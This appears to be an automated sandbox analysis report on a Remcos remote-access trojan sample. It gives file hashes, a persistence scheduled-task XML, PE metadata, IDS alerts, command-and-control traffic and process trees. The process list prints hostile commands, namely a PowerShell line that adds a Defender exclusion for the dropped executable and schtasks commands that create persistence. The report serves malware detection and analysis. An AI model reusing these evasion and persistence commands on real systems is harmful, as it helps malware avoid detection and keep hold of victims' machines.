          Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run

          C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe

          Download File
          Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe
          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
          Category:dropped
          Size (bytes):972800
          Entropy (8bit):7.826314472644776
          Encrypted:false
          SSDEEP:24576:1q7ngtNkKoxK5AP2EwiRcsgL5UNs3hpJB3FcU8Q:g7g7kKoKAOEF8UNYhpJ5F/8Q
          MD5:B8896A4D1ADBEFCC7FE4CAC53B134968
          SHA1:E7A68F4C1AC47ECC6CC43B12DC82651CFF63F670
          SHA-256:7815D02DD41DD657438B4B226F4AC1A33D6A37159E34448627088E1354F9AB69
          SHA-512:408CCA545C8556B6191629D40AC69A25A2396E90B1DAA74780BF5EEC62ABF908413836087FB45C48205CD35ACD653884FB958CECDD3A25F487B1C3B864E10E83
          Malicious:true
          Antivirus:
          • Antivirus: Joe Sandbox ML, Detection: 100%
          • Antivirus: Virustotal, Detection: 32%, Browse
          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...*................0.............j.... ........@.. .......................@............@.....................................O............................ ..........p............................................ ............... ..H............text...p.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................I.......H...........4Q......`.....................................................{....*"..}....*~.(.......s....}.....s....}....*>..{.....o.....*>..{.....o.....*....0............{.....+..*.0............{.....+..*j..{....o......{....o.....*..{....*"..}....*..{....*"..}....*..{....*"..}....*...0...........(.........%.(......(.....*..0..............%.(......(.....*.0............s.......o....o.......o....o.......o.....+O.o.......u.........,$..(..........X(.......u....(......+...(........

          C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe:Zone.Identifier

          Download File
          Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe
          File Type:ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):26
          Entropy (8bit):3.95006375643621
          Encrypted:false
          SSDEEP:3:ggPYV:rPYV
          MD5:187F488E27DB4AF347237FE461A079AD
          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
          Malicious:true
          Preview:[ZoneTransfer]....ZoneId=0

          Static File Info

          General

          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
          Entropy (8bit):7.826314472644776
          TrID:
          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
          • Win32 Executable (generic) a (10002005/4) 49.78%
          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
          • Generic Win/DOS Executable (2004/3) 0.01%
          • DOS Executable Generic (2002/1) 0.01%
          File name:SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe
          File size:972'800 bytes
          MD5:b8896a4d1adbefcc7fe4cac53b134968
          SHA1:e7a68f4c1ac47ecc6cc43b12dc82651cff63f670
          SHA256:7815d02dd41dd657438b4b226f4ac1a33d6a37159e34448627088e1354f9ab69
          SHA512:408cca545c8556b6191629d40ac69a25a2396e90b1daa74780bf5eec62abf908413836087fb45c48205cd35acd653884fb958cecdd3a25f487b1c3b864e10e83
          SSDEEP:24576:1q7ngtNkKoxK5AP2EwiRcsgL5UNs3hpJB3FcU8Q:g7g7kKoKAOEF8UNYhpJ5F/8Q
          TLSH:732512A43A16DA02C9A453FA0DB2FAB4177C1ECEA501D7568FEAADDF7572F012D40183
          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...*.................0.............j.... ........@.. .......................@............@................................

          File Icon

          Icon Hash:00928e8e8686b000

          Static PE Info

          General

          Entrypoint:0x4eed6a
          Entrypoint Section:.text
          Digitally signed:false
          Imagebase:0x400000
          Subsystem:windows gui
          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Time Stamp:0xB5CBC42A [Thu Aug 26 06:35:22 2066 UTC]
          TLS Callbacks:
          CLR (.Net) Version:
          OS Version Major:4
          OS Version Minor:0
          File Version Major:4
          File Version Minor:0
          Subsystem Version Major:4
          Subsystem Version Minor:0
          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

          Entrypoint Preview

          Instruction
          jmp dword ptr [00402000h]
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al

          Data Directories

          NameVirtual AddressVirtual Size Is in Section
          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IMPORT0xeed150x4f.text
          IMAGE_DIRECTORY_ENTRY_RESOURCE0xf00000x5ac.rsrc
          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
          IMAGE_DIRECTORY_ENTRY_BASERELOC0xf20000xc.reloc
          IMAGE_DIRECTORY_ENTRY_DEBUG0xecda80x70.text
          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

          Sections

          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
          .text0x20000xecd700xece00f473f4b890e4d87fdf25525ba52567a4False0.9208670019788918data7.831449073906565IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          .rsrc0xf00000x5ac0x600a218e0384a114232f91418375b6e31fcFalse0.4186197916666667data4.080098600579087IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .reloc0xf20000xc0x200676567dd7fbc47c348c5a0e944ffc4caFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

          Resources

          NameRVASizeTypeLanguageCountryZLIB Complexity
          RT_VERSION0xf00900x31cdata0.4321608040201005
          RT_MANIFEST0xf03bc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

          Imports

          DLLImport
          mscoree.dll_CorExeMain

          Network Behavior

          Suricata IDS Alerts

          TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
          2024-08-28T11:37:58.812561+0200TCP2032777ET MALWARE Remcos 3.x Unencrypted Server Response14568249712172.93.220.148192.168.2.6
          2024-08-28T11:37:57.926996+0200TCP2032776ET MALWARE Remcos 3.x Unencrypted Checkin14971245682192.168.2.6172.93.220.148
          2024-08-28T11:40:00.330083+0200TCP2032777ET MALWARE Remcos 3.x Unencrypted Server Response14568249712172.93.220.148192.168.2.6
          2024-08-28T11:42:01.566854+0200TCP2032777ET MALWARE Remcos 3.x Unencrypted Server Response14568249712172.93.220.148192.168.2.6
          2024-08-28T11:38:00.275897+0200TCP2803304ETPRO MALWARE Common Downloader Header Pattern HCa34971480192.168.2.6178.237.33.50

          Network Port Distribution

          TCP Packets

          TimestampSource PortDest PortSource IPDest IP
          Aug 28, 2024 11:37:57.856082916 CEST4971245682192.168.2.6172.93.220.148
          Aug 28, 2024 11:37:57.912115097 CEST4568249712172.93.220.148192.168.2.6
          Aug 28, 2024 11:37:57.912178993 CEST4971245682192.168.2.6172.93.220.148
          Aug 28, 2024 11:37:57.926995993 CEST4971245682192.168.2.6172.93.220.148
          Aug 28, 2024 11:37:57.931997061 CEST4568249712172.93.220.148192.168.2.6
          Aug 28, 2024 11:37:58.812561035 CEST4568249712172.93.220.148192.168.2.6
          Aug 28, 2024 11:37:58.815752983 CEST4971245682192.168.2.6172.93.220.148
          Aug 28, 2024 11:37:58.820692062 CEST4568249712172.93.220.148192.168.2.6
          Aug 28, 2024 11:37:59.008941889 CEST4568249712172.93.220.148192.168.2.6
          Aug 28, 2024 11:37:59.062889099 CEST4971245682192.168.2.6172.93.220.148
          Aug 28, 2024 11:37:59.661051035 CEST4971480192.168.2.6178.237.33.50
          Aug 28, 2024 11:37:59.665910006 CEST8049714178.237.33.50192.168.2.6
          Aug 28, 2024 11:37:59.665987015 CEST4971480192.168.2.6178.237.33.50
          Aug 28, 2024 11:37:59.666254997 CEST4971480192.168.2.6178.237.33.50
          Aug 28, 2024 11:37:59.671343088 CEST8049714178.237.33.50192.168.2.6
          Aug 28, 2024 11:38:00.275842905 CEST8049714178.237.33.50192.168.2.6
          Aug 28, 2024 11:38:00.275897026 CEST4971480192.168.2.6178.237.33.50
          Aug 28, 2024 11:38:00.291611910 CEST4971245682192.168.2.6172.93.220.148
          Aug 28, 2024 11:38:00.301120043 CEST4568249712172.93.220.148192.168.2.6
          Aug 28, 2024 11:38:01.280689955 CEST8049714178.237.33.50192.168.2.6
          Aug 28, 2024 11:38:01.280746937 CEST4971480192.168.2.6178.237.33.50
          Aug 28, 2024 11:38:29.255758047 CEST4568249712172.93.220.148192.168.2.6
          Aug 28, 2024 11:38:29.256998062 CEST4971245682192.168.2.6172.93.220.148
          Aug 28, 2024 11:38:29.261831045 CEST4568249712172.93.220.148192.168.2.6
          Aug 28, 2024 11:38:59.528814077 CEST4568249712172.93.220.148192.168.2.6
          Aug 28, 2024 11:38:59.529953957 CEST4971245682192.168.2.6172.93.220.148
          Aug 28, 2024 11:38:59.538520098 CEST4568249712172.93.220.148192.168.2.6
          Aug 28, 2024 11:39:30.069163084 CEST4568249712172.93.220.148192.168.2.6
          Aug 28, 2024 11:39:30.070080042 CEST4568249712172.93.220.148192.168.2.6
          Aug 28, 2024 11:39:30.070547104 CEST4971245682192.168.2.6172.93.220.148
          Aug 28, 2024 11:39:30.070579052 CEST4971245682192.168.2.6172.93.220.148
          Aug 28, 2024 11:39:30.075582027 CEST4568249712172.93.220.148192.168.2.6
          Aug 28, 2024 11:39:49.610013962 CEST4971480192.168.2.6178.237.33.50
          Aug 28, 2024 11:39:49.922285080 CEST4971480192.168.2.6178.237.33.50
          Aug 28, 2024 11:39:50.531697989 CEST4971480192.168.2.6178.237.33.50
          Aug 28, 2024 11:39:51.734796047 CEST4971480192.168.2.6178.237.33.50
          Aug 28, 2024 11:39:54.141084909 CEST4971480192.168.2.6178.237.33.50
          Aug 28, 2024 11:39:58.953578949 CEST4971480192.168.2.6178.237.33.50
          Aug 28, 2024 11:40:00.330082893 CEST4568249712172.93.220.148192.168.2.6
          Aug 28, 2024 11:40:00.334799051 CEST4971245682192.168.2.6172.93.220.148
          Aug 28, 2024 11:40:00.339857101 CEST4568249712172.93.220.148192.168.2.6
          Aug 28, 2024 11:40:08.562953949 CEST4971480192.168.2.6178.237.33.50
          Aug 28, 2024 11:40:30.580300093 CEST4568249712172.93.220.148192.168.2.6
          Aug 28, 2024 11:40:30.586666107 CEST4971245682192.168.2.6172.93.220.148
          Aug 28, 2024 11:40:30.591499090 CEST4568249712172.93.220.148192.168.2.6
          Aug 28, 2024 11:41:00.908044100 CEST4568249712172.93.220.148192.168.2.6
          Aug 28, 2024 11:41:00.909122944 CEST4971245682192.168.2.6172.93.220.148
          Aug 28, 2024 11:41:00.920205116 CEST4568249712172.93.220.148192.168.2.6
          Aug 28, 2024 11:41:31.261389971 CEST4568249712172.93.220.148192.168.2.6
          Aug 28, 2024 11:41:31.262394905 CEST4971245682192.168.2.6172.93.220.148
          Aug 28, 2024 11:41:31.268196106 CEST4568249712172.93.220.148192.168.2.6
          Aug 28, 2024 11:42:01.566854000 CEST4568249712172.93.220.148192.168.2.6
          Aug 28, 2024 11:42:01.567195892 CEST4971245682192.168.2.6172.93.220.148
          Aug 28, 2024 11:42:01.572051048 CEST4568249712172.93.220.148192.168.2.6

          UDP Packets

          TimestampSource PortDest PortSource IPDest IP
          Aug 28, 2024 11:37:59.647403002 CEST5443653192.168.2.61.1.1.1
          Aug 28, 2024 11:37:59.655013084 CEST53544361.1.1.1192.168.2.6

          DNS Queries

          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
          Aug 28, 2024 11:37:59.647403002 CEST192.168.2.61.1.1.10xb5feStandard query (0)geoplugin.netA (IP address)IN (0x0001)false

          DNS Answers

          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
          Aug 28, 2024 11:37:59.655013084 CEST1.1.1.1192.168.2.60xb5feNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

          HTTP Request Dependency Graph

          • geoplugin.net

          HTTP Packets

          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          0192.168.2.649714178.237.33.50806864C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe
          TimestampBytes transferredDirectionData
          Aug 28, 2024 11:37:59.666254997 CEST71OUTGET /json.gp HTTP/1.1
          Host: geoplugin.net
          Cache-Control: no-cache
          Aug 28, 2024 11:38:00.275842905 CEST1170INHTTP/1.1 200 OK
          date: Wed, 28 Aug 2024 09:38:00 GMT
          server: Apache
          content-length: 962
          content-type: application/json; charset=utf-8
          cache-control: public, max-age=300
          access-control-allow-origin: *
          Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
          Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


          Statistics

          CPU Usage

          Click to jump to process

          Memory Usage

          Click to jump to process

          High Level Behavior Distribution

          Click to dive into process behavior distribution

          Behavior

          Click to jump to process

          System Behavior

          General

          Target ID:0
          Start time:05:37:54
          Start date:28/08/2024
          Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe
          Wow64 process (32bit):true
          Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe"
          Imagebase:0x890000
          File size:972'800 bytes
          MD5 hash:B8896A4D1ADBEFCC7FE4CAC53B134968
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.2123662025.0000000003D59000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.2123662025.0000000003D59000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
          Reputation:low
          Has exited:true

          General

          Target ID:3
          Start time:05:37:55
          Start date:28/08/2024
          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          Wow64 process (32bit):true
          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe"
          Imagebase:0xef0000
          File size:433'152 bytes
          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          General

          Target ID:4
          Start time:05:37:56
          Start date:28/08/2024
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff66e660000
          File size:862'208 bytes
          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          General

          Target ID:5
          Start time:05:37:56
          Start date:28/08/2024
          Path:C:\Windows\SysWOW64\schtasks.exe
          Wow64 process (32bit):true
          Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bmkNCLNkqvOpVZ" /XML "C:\Users\user\AppData\Local\Temp\tmpB7C4.tmp"
          Imagebase:0xc20000
          File size:187'904 bytes
          MD5 hash:48C2FE20575769DE916F48EF0676A965
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          General

          Target ID:6
          Start time:05:37:56
          Start date:28/08/2024
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff66e660000
          File size:862'208 bytes
          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          General

          Target ID:7
          Start time:05:37:56
          Start date:28/08/2024
          Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe
          Wow64 process (32bit):false
          Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe"
          Imagebase:0x170000
          File size:972'800 bytes
          MD5 hash:B8896A4D1ADBEFCC7FE4CAC53B134968
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:low
          Has exited:true

          General

          Target ID:8
          Start time:05:37:56
          Start date:28/08/2024
          Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe
          Wow64 process (32bit):true
          Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe"
          Imagebase:0x6e0000
          File size:972'800 bytes
          MD5 hash:B8896A4D1ADBEFCC7FE4CAC53B134968
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.4554169284.0000000000CDA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          Reputation:low
          Has exited:false

          General

          Target ID:9
          Start time:05:37:57
          Start date:28/08/2024
          Path:C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe
          Wow64 process (32bit):true
          Commandline:C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe
          Imagebase:0xb60000
          File size:972'800 bytes
          MD5 hash:B8896A4D1ADBEFCC7FE4CAC53B134968
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Antivirus matches:
          • Detection: 100%, Joe Sandbox ML
          • Detection: 32%, Virustotal, Browse
          Reputation:low
          Has exited:true

          General

          Target ID:11
          Start time:05:37:58
          Start date:28/08/2024
          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
          Imagebase:0x7ff717f30000
          File size:496'640 bytes
          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
          Has elevated privileges:true
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          General

          Target ID:12
          Start time:05:37:59
          Start date:28/08/2024
          Path:C:\Windows\SysWOW64\schtasks.exe
          Wow64 process (32bit):true
          Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bmkNCLNkqvOpVZ" /XML "C:\Users\user\AppData\Local\Temp\tmpC65B.tmp"
          Imagebase:0x7ff66e660000
          File size:187'904 bytes
          MD5 hash:48C2FE20575769DE916F48EF0676A965
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          General

          Target ID:13
          Start time:05:37:59
          Start date:28/08/2024
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff66e660000
          File size:862'208 bytes
          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          General

          Target ID:14
          Start time:05:37:59
          Start date:28/08/2024
          Path:C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe
          Wow64 process (32bit):true
          Commandline:"C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe"
          Imagebase:0xec0000
          File size:972'800 bytes
          MD5 hash:B8896A4D1ADBEFCC7FE4CAC53B134968
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
          • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
          • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.2151682675.00000000016F7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          Reputation:low
          Has exited:true

          Disassembly

          Reset < >

            Execution Graph

            Execution Coverage:11%
            Dynamic/Decrypted Code Coverage:100%
            Signature Coverage:2.2%
            Total number of Nodes:225
            Total number of Limit Nodes:15
            execution_graph 35380 fa4668 35381 fa467a 35380->35381 35382 fa4686 35381->35382 35386 fa4778 35381->35386 35391 fa3e0c 35382->35391 35384 fa46a5 35387 fa479d 35386->35387 35395 fa4888 35387->35395 35399 fa4879 35387->35399 35392 fa3e17 35391->35392 35408 fa5c84 35392->35408 35394 fa7048 35394->35384 35396 fa48af 35395->35396 35397 fa498c 35396->35397 35404 fa4514 35396->35404 35400 fa47a7 35399->35400 35402 fa4887 35399->35402 35400->35382 35401 fa498c 35401->35401 35402->35401 35403 fa4514 CreateActCtxA 35402->35403 35403->35401 35405 fa5918 CreateActCtxA 35404->35405 35407 fa59db 35405->35407 35409 fa5c8f 35408->35409 35412 fa5ca4 35409->35412 35411 fa70ed 35411->35394 35413 fa5caf 35412->35413 35416 fa5cd4 35413->35416 35415 fa71c2 35415->35411 35417 fa5cdf 35416->35417 35420 fa5d04 35417->35420 35419 fa72c5 35419->35415 35421 fa5d0f 35420->35421 35423 fa85cb 35421->35423 35426 faac78 35421->35426 35422 fa8609 35422->35419 35423->35422 35430 facd60 35423->35430 35435 faac9f 35426->35435 35439 faacb0 35426->35439 35427 faac8e 35427->35423 35431 facd91 35430->35431 35432 facdb5 35431->35432 35462 fad328 35431->35462 35466 fad319 35431->35466 35432->35422 35436 faacb0 35435->35436 35442 faada8 35436->35442 35437 faacbf 35437->35427 35441 faada8 2 API calls 35439->35441 35440 faacbf 35440->35427 35441->35440 35443 faadb9 35442->35443 35444 faaddc 35442->35444 35443->35444 35450 fab040 35443->35450 35454 fab031 35443->35454 35444->35437 35445 faadd4 35445->35444 35446 faafe0 GetModuleHandleW 35445->35446 35447 fab00d 35446->35447 35447->35437 35451 fab054 35450->35451 35452 fab079 35451->35452 35458 faa188 35451->35458 35452->35445 35455 fab040 35454->35455 35456 faa188 LoadLibraryExW 35455->35456 35457 fab079 35455->35457 35456->35457 35457->35445 35460 fab620 LoadLibraryExW 35458->35460 35461 fab699 35460->35461 35461->35452 35463 fad335 35462->35463 35464 fad36f 35463->35464 35470 facf14 35463->35470 35464->35432 35467 fad328 35466->35467 35468 facf14 2 